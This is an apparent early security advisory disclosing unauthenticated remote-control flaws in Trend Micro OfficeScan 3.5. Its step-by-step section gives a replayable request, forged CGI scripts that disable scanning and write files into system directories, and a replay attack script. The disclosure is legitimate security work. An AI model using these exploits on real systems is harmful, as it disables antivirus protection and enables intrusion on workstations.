hi, All of u have certainly seen the possibly general dos attack against OfficeScan just by connecting a client to the port 12345 without sending any TCP FIN packet at the application time-out. After several tests on OfficeScan 3.5, I realized there were numerous other security flaws resulting in possible intrusion scenarios and because of a lack of authentication/crypto protocol between clients and manager. OfficeScan can be potentially used as a trojan horse with some preliminaries steps resulting in a remote intrusion on every LAN workstations. IMPACT ======= Systems concerned are Windows 95, 98, 2000 and NT The internal network malicious user can : 1- remotely uninstall the anti virus 2- remotely start the scan on the machine 3- remotely stop the scan 4- remotely make the anti virus inefficient by modifying the scan configuration file through the network on the target pc. 5- and finally, remotely write anywhere on the target file system !. COOK BOOK to hack OfficeScan through the LAN ===================================== Step 1- Replay Attack (simplest way to gain a general DOS over the LAN) The first thing to do for the LAN attacker is to sniff its own pc with OS installed on it then he has to catch an admin. packet toward any 12345 Scan Office port to replay the same request. An example of such a request : . . G E T / ? 0 5 6 8 0 F 5 4 5 E 8 8 A E D 5 3 9 2 B 8 8 5 E E 7 1 4 2 D 8 B B F 8 E 3 5 2 6 9 3 7 2 5 4 3 0 D C 1 E 7 F 9 5 4 F B 3 4 5 F E 8 9 9 F 0 1 2 0 3 B 2 2 2 C F A F 8 B 0 5 C A 5 D 9 0 C F 5 D E E 7 3 8 1 0 2 A B 1 C A E E E 6 2 F 7 F 4 A A 3 6 E C D 2 0 C B 5 E A D E C 2 C 5 4 7 7 6 6 5 0 D 5 5 5 A 9 4 1 5 B E 5 3 4 8 E 7 F 0 0 F 9 8 1 A 5 D B E E 1 F 3 A B 3 0 F A B C 4 3 3 2 3 0 F 6 6 B 4 9 9 8 2 F D A 5 F 0 7 7 D 0 7 A F 7 2 1 C D 7 9 1 8 A 5 5 8 0 C 3 3 1 B C 4 C 2 A 9 5 9 B F 6 3 4 1 1 2 B 4 F 9 A 9 3 9 5 3 B 8 F 6 4 B 0 2 C 8 8 1 E D 6 C 5 5 B F C D 6 2 0 5 6 1 3 4 B B F 8 0 0 7 E F F B 6 6 4 3 5 1 8 1 A 7 7 6 2 E E 0 2 B 8 9 1 3 F 5 4 5 D 2 5 1 1 8 9 7 C 8 9 8 F 3 E 5 3 B B 8 D 4 F 4 E C 7 1 E 7 F A C 6 D 8 E 2 6 D 3 E 5 5 A 9 A 7 C 1 E B 9 6 B D F D 2 B E 8 4 4 F C 5 E C 6 5 D A F 6 C 7 1 C 0 2 9 4 2 A 9 2 B B 9 7 8 A C 8 7 5 1 2 0 2 C 5 0 E E 4 0 4 4 5 D D 6 C D 1 1 C E 1 1 A 9 9 0 6 H T T P / 1 . 0 . . H o s t : X1.X2.X3.X4 : 1 2 3 4 5 . . U s e r - A g e n t : O f f i c e S c a n / 3 . 5 . . A c c e p t : * / * . . . . . . The exact format of the HTTP request isn't know...it may be a kind of signature of the admin. password and other local network specifics information, may be not. More information about this point will be welcomed. At least, the last 2 bytes in it (06 in our example) is needed to code the type of request. Furthers tests later, some of these codes was definitely identified: 03: used for the Alert.msg file on the remote system 04: uninstallation request 06: launch a virus scan on the pc 07: Stop the scan. Because Tmlisten on the client side, doesn't check for a particular admin. IP or any other authentication protocol, the intruder can without any problem start a connection to the port 12345 and replay the request 03,04, 06 and 07 But if he wishes to remotely modify the behavior of the anti virus, he 'll have to go to step 2. Step 2- Remote manipulation (leading to hosts intrusions and/or general DOS) Now a little more about Office Scan communication protocol. It appears that client process communicate regularly with numerous resident cgi on the manager side (with IIS installed on it) for, among other things, file transfer purpose. When the two clients services are launched (TmListen.exe and NTRScan.exe) they ask for a cgi called cgiOnStart.exe. an example of such a request (sniffit was used this time): ------------------------------------ G E T / o f f i c e s c a n / c g i / c g i O n S t a r t . e x e ? U I D = 4 6 3 1 8 5 3 0 - f 0 6 3 - 1 1 d 3 - 9 1 a e - 0 0 c 0 4 f 4 a 4 c 9 9 & D A T E = 2 0 0 0 0 3 0 3 & T I M E = 1 4 2 9 3 0 & C O M P U T E R = N OM & P L A T F O R M = W i n d o w s % 2 0 N T % 2 0 4 % 2 e 0 % 2 e 1 3 8 1 & I P = Y1.Y2.Y3.Y4 & P T N F I L E = 6 6 5 & P R O G R A M = 3 . 5 0 & E N G I N E = 5 . 1 0 0 & E N C Y = 3 5 & D O M A I N = H o f & H O T F I X = & I N S T D A T E = 2 0 0 0 0 3 0 2 & I N S T T I M E = 1 8 5 2 1 0 & M O B I L E = 0 & R E L E A S E = 3 . 5 0 H T T P / 1 . 0 . . A c c e p t : * / * . . U s e r - A g e n t : O f f f i c e S c a n N T C l i e n t . . H o s t : X1.X2.X3.X4 . . C o n n e c t i o n : K e e p - A l i v e When the intruder send a 06 type request for remote scanning, sniffer can catch some new requests toward the web port 80. figure: ---- ATTACKER | | | 1/ Request 06 | | \/ [12345] TARGET ----------------------> [80] Network Manager 2/ anti viral scan <------1------ 3/ GET /cgi/cgiOnStart.exe <--- Cfg File---- 4/ GET /cgi/cgiRqCfg.exe <------------- 5/ GET /cgi/cgiOnScan.exe So when the scan start, the client ask the manager for a configuration file that control many aspects of the processes. The cgi cgiRqCfg .exe give a runtime generated configuration file for the scan, in a plain text format over the network, the different keywords present inside the file stay resident inside the Windows registry. By spoofing the manager and carefully design a web server with the same file structure and cgi name, our intruder will be able to forge manually configuration files and so to remotely modify the anti virus behavior. Figure: ---- ATTACKER (IP OF MANAGER) | [80] cgiRqCfg.exe | /\ | 06 | | | ( Infectious Configuration File ) | | | \/ | \/ TARGET MANAGER (disabled by IP spoofing) What can i do with the configuration file ???? ok now just take a look at the various keywords: ------------------------------ [Scan Now Configuration]" UID=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Scan Memory=0 CompressedLayer=2 ScanALLFiles=0 ExtList=.exe, .com ScanRemoveable=0 ScanFixedDisk=0 ScanCDRom=0 VirusFoundAction=5 BkUpIfClean=0 MoveDir=MANAGER\VIRUS CleanFailedAction=3 CleanFailedMoveDir=MANAGER\\VIRUS Reserved= All this data are stored inside the HKEY_LOCAL_MACHINE/Software/TrendMicro/PCCilin-NTCORP/CurrentVersion/Real Time Scan registry key *By modifying the MoveDir and CleanFailedMoveDir bye the value TARGET\\anywhere, it's possible to force the remote anti virus to write all the infected file locally ANYWHERE on the file system, that is to say in the Winnt directory too. By modifying "ScanRemoveable", "ScanFixedDisk", "ScanCDRom" to zero, it 's possible to force the anti virus to zero scan even if the services are still alive. The method is far more stealth in order to compromise a pc with a Trojan attached mail. Modify ExtList with a ".txt" value will force anti virus to scan only txt file ;) Source example of fakes cgi: cgiRqCfg.exe: --------- #!/bin/sh echo "Content-type: text/plain" echo echo "[Scan Now Configuration]" echo "UID=N0thing th4nk you" echo "Scan Memory=0" echo "CompressedLayer=2" echo "ScanALLFiles=0" echo "ExtList= YES IT's POSS1bl3 !" echo "ScanRemoveable=0" echo "ScanFixedDisk=0" echo "ScanCDRom=0" echo "VirusFoundAction=5" echo "BkUpIfClean=0" echo "MoveDir=c:\winnt" echo "CleanFailedAction=3" echo "CleanFailedMoveDir=c:\winnt" echo "Reserved=" cgiOnStart.exe ---------- #!/bin/sh echo "Pragma: no-cache" echo "Content-type: text/plain;charset=utf-8" echo echo "1" the little script for the scan request: Tr3ndAtt4ck.sh target_client_ip --------------------- #!/bin/sh ( sleep 2 echo "GET /?05680F545E88AED5392B885EE7142D8BBF8E352693725430DC1E7F954FB345FE899F 01203B222CFAF8B05CA5D90CF5DEE738102AB1CAEEE62F7F4AA36ECD20CB5EADEC2C54776650D555 A9415BE5348E7F00F981A5DBEE1F3AB30FABC433230F66B49982FDA5F077D07AF721CD7918A5580C 331BC4C2A959BF634112B4F9A93953B8F64B02C881ED6C55BFCD62056134BBF8007EFFB66435181A 7762EE02B8913F545D2511897C898F3E53BB8D4F4EC71E7FAC6D8E26D3E55A9A7C1EB96BDFD2BE84 4FC5EC65DAF6C71C02942A92BB978AC8751202C50EE40445DD6CD11CE11A9906 HTTP/1.0" echo "Host: "$1":12345" echo "User-Agent: OfficeScan/3.5" echo "Accept: */*" echo echo sleep 5 )| telnet $1 12345 2>&1 | tee -a ./log.txt SOLUTION ========= In fact, there is not a lot of choice i think. Users should stop their service NTlisten.exe the time for trend to build the new version. However please ask Trend team for more suggestions. Please don't use this few lines for any illegal purpose and ask TrendMicro for any further questions. Regards, =========================== Gregory Duchemin Network & Security Engineer. gdn@neurocom.com http://www.securite-internet.com ===========================